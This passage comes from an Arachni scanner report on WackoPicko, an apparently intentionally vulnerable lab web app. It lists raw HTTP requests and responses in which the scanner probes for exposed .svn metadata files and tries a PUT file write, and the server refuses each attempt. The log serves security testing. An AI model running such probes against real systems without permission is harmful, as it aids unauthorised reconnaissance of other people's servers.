Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   

Interesting response 25 interesting_responses

The server responded with a non 200 (OK) nor 404 (Not Found) status code. This is a non-issue, however exotic HTTP response status codes can provide useful insights into the behavior of the web application and assist with the penetration test.

Proof
HTTP/1.1 403 Forbidden
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/.svn/all-wcprops HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:50:40 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 202
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/users/.svn/all-wcprops
on this server.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 100 Continue
HTTP request

Raw HTTP request used to retrieve the page.

PUT /WackoPicko/css/blueprint/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=uaamb63nosf2arsi1c95ipa045
Content-Length: 55
Expect: 100-continue

Created by Arachni. PUTca890a60d2e09a1de6dc78b0f4d0f8ec
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 100 Continue

HTTP/1.1 405 Method Not Allowed
Date: Mon, 06 Aug 2018 22:52:43 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /WackoPicko/css/blueprint/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 403 Forbidden
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/css/blueprint/.svn/wc.db HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=uaamb63nosf2arsi1c95ipa045

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:52:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 202
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/css/blueprint/.svn/wc.db
on this server.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 403 Forbidden
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/.svn/wc.db HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:50:40 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 198
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/users/.svn/wc.db
on this server.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 403 Forbidden
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/upload/3/.svn/all-wcprops HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=uaamb63nosf2arsi1c95ipa045

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:52:40 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 203
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/upload/3/.svn/all-wcprops
on this server.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
